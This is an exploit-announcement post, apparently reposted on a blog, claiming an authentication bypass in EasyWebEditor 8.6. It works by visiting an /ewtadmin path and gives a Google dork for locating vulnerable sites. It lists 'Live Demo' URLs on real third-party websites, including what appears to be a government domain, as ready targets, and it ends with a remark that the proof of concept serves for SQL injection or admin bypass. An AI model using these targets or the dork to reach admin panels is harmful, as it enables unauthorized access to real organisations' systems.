EasyWebEditor 8.6 Authentication Bypass



# Exploit Title: EasyWebEditor 8.6 - Authentication Bypass
# Google Dork: inurl:ewt_news.php?nid=

# Date: 2017-06-16
# Exploit Author: Mersad Security Research
# Software Link: -
# Version: All Version
# Tested on: Kali Liunx
--------------------------------------
Exploit:/ewtadmin

http://127.0.0.1/ewtadmin
-------------------------------------
Live Demo:
http://203.150.225.0/ewtadmin/
http://www.ilovethaiculture.com/ewtadmin/
http://www.dmr.go.th/ewtadmin/
-------------------------------------
# Discovered By: Sh4dow (BlackPentester@Gmail.Com)
# We Are:Mersad (Mersad - Gray Industry)
# https://telegram.me/MersadGroup
# Mersad@Protonmail.Com

NB : ini poc bisa di pake sql / bypass admin

Share this

Related Posts

Previous
Next Post »